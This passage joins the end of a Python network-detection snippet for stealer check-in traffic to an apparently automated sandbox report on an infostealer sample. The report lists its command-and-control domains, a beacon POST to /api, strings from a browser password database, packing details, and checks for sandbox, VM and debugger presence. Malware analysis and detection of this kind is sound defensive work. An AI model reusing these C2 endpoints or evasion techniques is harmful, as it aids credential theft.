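        print(a)
```

Feed it decrypted-proxy or Zeek http.log fields in the same order; the benign upload.example.org lines show why the check-in precondition matters, since a browser file upload alone produces several large multipart POSTs but no preceding tiny form POST and no repeated boundary.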
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic; DNS traffic detected: DNS query: presticitpo.store
Source: global traffic; DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic; DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic; DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic; DNS traffic detected: DNS query: necklacedmny.store
Source: unknown; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135307074.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/
Source: file.exe, file.exe, 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2166544965.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123467176.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2136155560.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135354611.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135255919.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2146961221.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123719627.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123784394.00000000011BA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/api-
Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/apiY
Source: file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/apie
Source: file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://necklacedmny.store/apis
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_011AFF9C
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9979121767241379
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.2076793763.0000000005AF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089937200.0000000005B57000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089730174.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | Virustotal: Detection: 50%
Source: file.exe | ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: file.exe | Static file information: File size 3001344 > 1048576
Source: file.exe | Static PE information: Raw size of vsrxmbmz is bigger than: 0x100000 < 0x2b1200

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc:W;.idata :W;vsrxmbmz:EW;xopfihuh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vsrxmbmz:EW;xopfihuh:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2e4086 should be: 0x2e79f1
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: vsrxmbmz
Source: file.exe | Static PE information: section name: xopfihuh
Source: file.exe | Static PE information: section name: .taggant
Source: file.exe | Static PE information: section name: entropy: 7.970180597409933

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF0FA second address: AEF113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jo 00007F79A547B392h 0x0000000d jne 00007F79A547B386h 0x00000013 js 00007F79A547B386h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF113 second address: AEF150 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F79A4C9A8EEh 0x00000010 jbe 00007F79A4C9A8ECh 0x00000016 pushad 0x00000017 jo 00007F79A4C9A8E6h 0x0000001d jmp 00007F79A4C9A8EDh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF3BD second address: AEF3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F79A547B386h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF2F8A second address: AF2FA3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F79A4C9A8E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF2FA3 second address: AF2FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF2FA9 second address: AF2FD4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F79A4C9A8F5h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A4C9A8ECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF2FD4 second address: AF3003 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79A547B39Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F79A547B386h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF30AB second address: AF30C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF30C0 second address: AF30F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B399h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF30F2 second address: AF3127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007F79A4C9A8F5h 0x00000011 jno 00007F79A4C9A8ECh 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF31CE second address: AF31D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF3293 second address: AF3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF3299 second address: AF32A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF32A5 second address: AF32F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F79A4C9A8F6h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov esi, ecx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1F94h], esi 0x00000019 call 00007F79A4C9A8E9h 0x0000001e pushad 0x0000001f je 00007F79A4C9A8E8h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F79A4C9A8F4h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF32F7 second address: AF3329 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79A547B386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F79A547B392h 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F79A547B388h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF3329 second address: AF33DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79A4C9A8ECh 0x00000008 jnl 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F79A4C9A8F3h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push esi 0x0000001c jmp 00007F79A4C9A8F3h 0x00000021 pop esi 0x00000022 pop eax 0x00000023 mov esi, dword ptr [ebp+122D1F89h] 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D1F9Fh], ecx 0x00000033 push 00000003h 0x00000035 push 97C2BAF1h 0x0000003a pushad 0x0000003b push eax 0x0000003c jno 00007F79A4C9A8E6h 0x00000042 pop eax 0x00000043 jno 00007F79A4C9A8F5h 0x00000049 popad 0x0000004a xor dword ptr [esp], 57C2BAF1h 0x00000051 mov edx, ecx 0x00000053 lea ebx, dword ptr [ebp+12457E90h] 0x00000059 push 00000000h 0x0000005b push edx 0x0000005c call 00007F79A4C9A8E8h 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], edx 0x00000066 add dword ptr [esp+04h], 00000017h 0x0000006e inc edx 0x0000006f push edx 0x00000070 ret 0x00000071 pop edx 0x00000072 ret 0x00000073 mov dword ptr [ebp+122D1CB8h], edi 0x00000079 xchg eax, ebx 0x0000007a jc 00007F79A4C9A8EEh 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF343B second address: AF346D instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A547B386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, 0915h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D1E4Ah], ecx 0x00000017 or esi, dword ptr [ebp+122D2B15h] 0x0000001d push 121A4BDEh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jbe 00007F79A547B386h 0x0000002b jl 00007F79A547B386h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF346D second address: AF34C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 121A4B5Eh 0x00000010 mov dword ptr [ebp+122D1FCBh], esi 0x00000016 sbb cx, 588Ah 0x0000001b push 00000003h 0x0000001d mov dword ptr [ebp+122D1C9Dh], ebx 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D38CBh], edx 0x0000002b or edx, 6EE59E96h 0x00000031 push 00000003h 0x00000033 jmp 00007F79A4C9A8EEh 0x00000038 push 8BC26EE0h 0x0000003d push eax 0x0000003e push edx 0x0000003f jc 00007F79A4C9A8E8h 0x00000045 push edx 0x00000046 pop edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF34C2 second address: AF350C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4BC26EE0h 0x00000010 mov ecx, dword ptr [ebp+122D2D7Dh] 0x00000016 lea ebx, dword ptr [ebp+12457E9Bh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F79A547B388h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b pop eax 0x0000003c push esi 0x0000003d pop esi 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE735B second address: AE7378 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79A4C9A8F3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE7378 second address: AE73A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F79A547B386h 0x00000015 jmp 00007F79A547B391h 0x0000001a rdtsc
